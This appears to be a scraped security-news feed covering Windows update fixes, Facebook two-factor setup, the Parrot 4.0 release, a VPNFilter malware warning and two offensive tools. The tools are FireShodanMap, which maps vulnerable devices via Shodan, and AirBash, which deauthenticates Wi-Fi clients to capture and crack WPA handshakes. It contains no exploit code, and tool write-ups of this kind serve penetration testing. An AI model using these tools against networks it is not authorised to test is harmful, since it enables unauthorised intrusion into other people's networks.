  • Addresses an issue that causes a VM to throw an error after creating the VM with static memory. This occurs when you enable HYPER-V and disable NUMA in the BIOS on a physical machine that has more than 64 logical processors. The error is “The data is invalid. (0x8007000D)”, and the VM fails to start. 
  • Addresses an issue that occurs when multiple processes are limited by rate, using job objects. This can cause various symptoms including, but not limited to, system-process CPU spikes, interrupt-time CPU spikes, high privileged time on some CPUs, and increased system or processor queue lengths.
  • Addresses an issue that causes docker builds to fail with the error message “hcsshim::ImportLayer failed in Win32: The system cannot find the path specified.” 
  • Addresses an issue in which Windows 10 clients that authenticate to 802.1x WLAN access points fail to apply Group Policy permissions, run scripts, or retrieve roaming profiles at user logon. This occurs because Kerberos authentication fails for \\domain\sysvol, \\domain\netlogon, and other DFS paths. 
  • Addresses an issue in a RemoteApp session that causes clicking in the foreground window to become unresponsive when using grouped windows. 
  • Addresses an issue in a RemoteApp session that may result in a black screen when maximizing an application on a secondary monitor.
  • Addresses an issue with application association in the DISM tool.
  • Adds support to Microsoft Edge and Internet Explorer 11 for the SameSite cookie web standard.  For more details about SameSite cookies, see our recently published blog post.
  • If you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.

How to Update?


Go to Settings 
> Update & Security 
> Windows Update and select Check for updates.

To get the standalone package for this update, go to the Microsoft Update Catalog website.

Important When installing both the servicing stack update (SSU) KB4132650 and the latest cumulative update (LCU) from the Microsoft Update Catalog, install the SSU before installing the LCU.

Facebook Makes Two Factor Authentication Easier To Setup

$
0
0
Facebook Adds Two Factor Authentication Easier To Setup


Facebook Makes Two Factor Authentication Easier To Setup


Facebook is working more on their security after the Cambridge Data Scandal. The company explains that how Two-factor authentication (2FA) for the Facebook user now easier to set up.

Now Facebook is allowing users to use 2FA without having to register their phone number with Facebook. It means we can use third party authentication apps like Authy and Google Authenticator for 2FA on Facebook.

We hope you all are aware of 2 Factor authentication which means the second layer of protection on your account.

Company improved two-factor authentication in two ways:  

  • We've made it easier than ever to enable two-factor authentication with a streamlined setup flow that guides you through the process. 
  • We've also expanded the ways in which you can secure your account with a second factor by ensuring that people can enable two-factor authentication without registering a phone number. 

Facebook said, we previously required a phone number in order to set up two-factor authentication, to help prevent account lock-outs. Now that we have redesigned the feature to make the process easier to use third-party authentication apps like Google Authenticator and Duo Security on both desktop and mobile, we are no longer making the phone number mandatory.

How can we Turn on 2FA on Facebook?

1. First, visit facebook.com/settings and click on the “Security and Login” tab.


2. Now scroll down and click on Two Factor Authentication "Edit"



3. After getting started you add extra security to your account every time you log in to a phone or computer.

When you login you need to add your password and OTP sent by Facebook or you can use third party security apps like Google Authenticator/ Authy to login your account.

Penetration Testing Linux Based Operating System Parrot 4.0 Version Released

$
0
0


Penetration Testing Linux Based Operating System "Parrot 4.0" Version Released.  



Parrot is a GNU/Linux distribution based on Debian and focused on Penetration Testing, Digital Forensics, Programming, Reverse Engineering and Privacy protection. It also introduces new Linux 4.16 Kernel.


Parrot 4.0 includes all the updated packages and many bug fixes released since its last version. Also updating new development and testing process of new features.

On Parrot 4.0 we decided to provide netinstall images too as we would like people to use Parrot not only as a pentest distribution, but also as a framework to build their very own working environment with ease.

Docker images

Docker is a powerful container technology that allows our users to quickly download a Parrot template and immediately spawn unlimited and completely isolated parrot instances on top of any host OS.

Parrot on Docker gives you access to all the Parrot containers you need on top of Windows, Mac OS, or any other system supported by docker, no matter if it is just your laptop or a whole docker cluster running on an entire datacenter. You will always have access to all the parrot tools in all the isolated environments you need.

New Linux Kernel 

In Parrot OS 4.0 introduce new Linux 4.16 Kernel. Which are important new features, broader hardware support and important bug fixes including AMDGPU multi-display fixes, optimized in-kernel filesystem operations and so on.

Sandbox

Here Sandbox applications have been updated for better stability and security.

Nginx

New default web server is Nginx in this Parrot OS version. Previously it was Apache2 which is heavy and complex to configure and maintain. But Nginx is a fast, powerful and more secure web server. Also, its configuration is very easy to use.

MD Raid Support

Parrot 4.0 now includes md raid support by default.
It was a great lack in the previous versions because the parrot is also meant to be used for forensic analysis, and to be able to open software raids can be crucial while reading disks in a server environment.

Here you can find Full List of updated packages.

How to upgrade?

If you are using Parrot previous version then follow the commands in terminal to upgrade.

sudo apt update
sudo apt purge tomoyo-tools
sudo apt full-upgrade
sudo apt autoremove

Or you can Download here

FireShodanMap: Realtime Map that integrates Firebase, Google Maps And Shodan

$
0
0
FireShodanMap: Realtime Map that integrates Firebase, Google Maps and Shodan


FireShodanMap is a Realtime Map that integrates Firebase, Google Maps and Shodan. It's Code written in Python script.

A search is carried out using Shodan searching vulnerable devices and they are showed on the map for analysis. All data updated in Firebase are Realtime.

Changes

We have a file named "fireshodan.py" responsible for fill Firebase database, we need to change:

[+] FILE_WITH_KEY.json (Open the Credentials tab and click Create credentials. You want the API key option. Create a server key. It will automatically download as a *.json file)
[+] KEY_FIREBASE_HERE (Open the Firebase Project and click Add Firebase to your web application)
[+] API_SHODAN_KEY

Now, we need to change index.html and firebase_conf.jsfiles.

[+] index.html - MY_KEY_MAP
[+] firebase_conf.js - Open the Firebase Project and click Add Firebase to your web application

Usage Example

Access index.html file and run "python fireshodan.py" to fill your database.
You can see your data now. If you remove any data your map will update automatic.
OBS: If you stop the script the data will continue there

Download FireShodanMap

FBI And Cyber Experts Officially Warns Internet Users To Protect their Routers From VPNFilter Malware

$
0
0
Routers infected with VPNFilter Malware


FBI and Cyber Experts officially warns Internet users to protect their routers from VPNFilter Malware.


Federal Bureau of Investigation (FBI) and Cybersecurity experts warn Internet users to protect their office and home routers from a Cyber attack by Russian Hackers.

  • More than 50 countries of routers were infected by VPNFilter Malware. 
  • Belkin International’s Linksys, MikroTik, Netgear Inc, TP-Link and QNAP known devices affected.

In a statement on 25th May 2018 that foreign cyber criminals had used a malware program known as "VPNFilter" to infect "hundred of thousands" of home and office routers and other networked devices worldwide.

The warning comes after Cisco Talos Intelligence report of new VPNFilter malware targets at least 500k networking devices worldwide.

Talos said, working with our partners, we estimate the number of infected devices to be at least 500,000 in at least 54 countries. The known devices affected by VPNFilter are Linksys, MikroTik, NETGEAR and TP-Link networking equipment in the small and home office (SOHO) space, as well as QNAP network-attached storage (NAS) devices. No other vendors, including Cisco, have been observed as infected by VPNFilter, but our research continues.

The behaviour of this malware on networking equipment is particularly concerning, as components of the VPNFilter malware allows for theft of website credentials and monitoring of Modbus SCADA protocols.

According to report,

The justice department announced at late Wednesday an effort to disrupt a botnet known as "VPNFilter" that compromised an estimated 500,000 home and office routers and other network devices. Officials explicitly linked the botnet to the cyber espionage group known as APT 28 or Sofacy, believed to be connected to the Russian government.

How does VPNFilter Malware work?

This malware works as a multi-stage platform with various capabilities to support both intelligence collection and destructive cyber attack operations. Talos explains as follow:

In Stage 1 Malware persists through a reboot, which sets it apart from the other usual malwares that targets internet-of-things (IoT) devices because malware normally does not survive a reboot of the device. The main purpose of stage 1 is to gain a persistent foothold and enable the deployment of the stage 2 malware. Stage 1 utilizes multiple redundant command and control (C2) mechanisms to discover the IP address of the current stage 2 deployment server, making this malware extremely robust and capable of dealing with unpredictable C2 infrastructure changes.

The stage 2 malware, which does not persist through a reboot, have capabilities that we have come to expect in a workhorse intelligence-collection platform, such as file collection, command execution, data ex-filtration and device management. However, some versions of stage 2 also possess a self-destruct capability that overwrites a critical portion of the device's firmware and reboots the device, making it unusable. Based on the actor's demonstrated knowledge of these devices, and the existing capability in some stage 2 versions, we assess with high confidence that the actor could deploy this self-destruct command to most devices that it controls, regardless of whether the command is built into the stage 2 malware.

In addition, there are multiple stage 3 modules that serve as plugins for the stage 2 malware. These plugins provide stage 2 with additional functionality. As of this writing, we are aware of two plugin modules: a packet sniffer for collecting traffic that passes through the device, including theft of website credentials and monitoring of Modbus SCADA protocols, and a communications module that allows stage 2 to communicate over Tor. We assess with high confidence that several other plugin modules exist, but we have yet to discover them.

Image by talosintelligence.com


How To Defend against VPNfilter Malware?

To defend against this malware is difficult, because of the devices connected to the internet with vulnerable devices. The User must have to update their routers and use anti-malware software to counter them.
  • Users of SOHO routers and/or NAS devices reset them to factory defaults and reboot them in order to remove the potentially destructive, non-persistent stage 2 and stage 3 malware.
  • Internet service providers that provide SOHO routers to their users reboot the routers on their customers' behalf.
  • If you have any of the devices known or suspected to be affected by this threat, it is extremely important that you work with the manufacturer to ensure that your device is up to date with the latest patch versions. If not, you should apply the updated patches immediately.
  • ISPs work aggressively with their customers to ensure their devices are patched to the most recent firmware/software versions.

AirBash: A POSIX-compliant, Fully Automated WPA PSK Handshake Capture Script For Penetration Testing

$
0
0
Fully Automated WPA PSK Handshake Capture Script For Penetration Testing

AirBash: A POSIX-compliant, fully automated WPA PSK handshake capture script aimed at penetration testing


It is compatible with Bash and Android Shell (tested on Kali Linux and Cyanogenmod 10.2) and uses aircrack-ng to scan for clients that are currently connected to access points (AP). Those clients are then deauthenticated in order to capture the handshake when attempting to reconnect to the AP.

Verification of a captured handshake is done using aircrack-ng. If one or more handshakes are captured, they are entered into an SQLite3 database, along with the time of capture and current GPS data (if properly configured).

After capture, the database can be tested for vulnerable router models using crackdefault.sh. It will search for entries that match the implemented modules, which currently include algorithms to compute default keys for Speedport 500-700 series, Thomson/SpeedTouch and UPC 7 digits (UPC1234567) routers.

Requirements

WiFi interface in monitor mode aircrack-ng SQLite3 openssl for compilation of modules (optional) wlanhc2hcx from hcxtools

In order to log GPS coordinates of handshakes, configure your coordinate logging software to log to .loc/*.txt (the filename can be chosen as desired). Airbash will always use the output of cat "$path$loc"*.txt 2>/dev/null | awk 'NR==0; END{print}', which equals to reading all .txt files in .loc/ and picking the second line. The reason for this way of implementation is the functionality of GPSLogger, which was used on the development device.

Calculating default keys

After capturing a new handshake, the database can be queried for vulnerable router models. If a module applies, the default keys for this router series are calculated and used as input for aircrack-ng to try and recover the passphrase.

Usage

Running install.sh will create the database, prepare the folder structure and create shortlinks to both scripts which can be moved to a directory that is on $PATH to allow execution from any location.

After installation, you may need to manually adjust INTERFACE on line 46 in airba.sh. This will later be determined automatically, but for now the default is set to wlan0, to allow out of the box compatibility with bcmon on Android.

./airba.sh starts the script, automatically scanning and attacking targets that are not found in the database.
./crackdefault.sh attempts to break known default key algorithms.

To view the database contents, run sqlite3 .db.sqlite3 "SELECT * FROM hs" in the main directory.

Update (Linux only ... for now):

Airbash can be updated by executing update.sh. This will clone the master branch into /tmp/ and overwrite the local files.

Output

_n: number of access points found

__c/m: represents client number and maximum number of clients found, respectively

-: access point is blacklisted

x: access point already in database

?: access point out of range (not visible to airodump anymore)

The Database

The database contains a table called hs with seven columns.

  • id: incrementing counter of table entries
  • lat and lon: GPS coordinates of the handshake (if available)
  • bssid: MAC address of the access point
  • essid: Name identifier
  • psk: WPA Passphrase, if known
  • prcsd: Flag that gets set by crackdefault.sh to prevent duplicate calculation of default keys if a custom passphrase was used.

Currently, the SQLite3 database is not password-protected.

Download AirBash
Viewing all 855 articles
Browse latest View live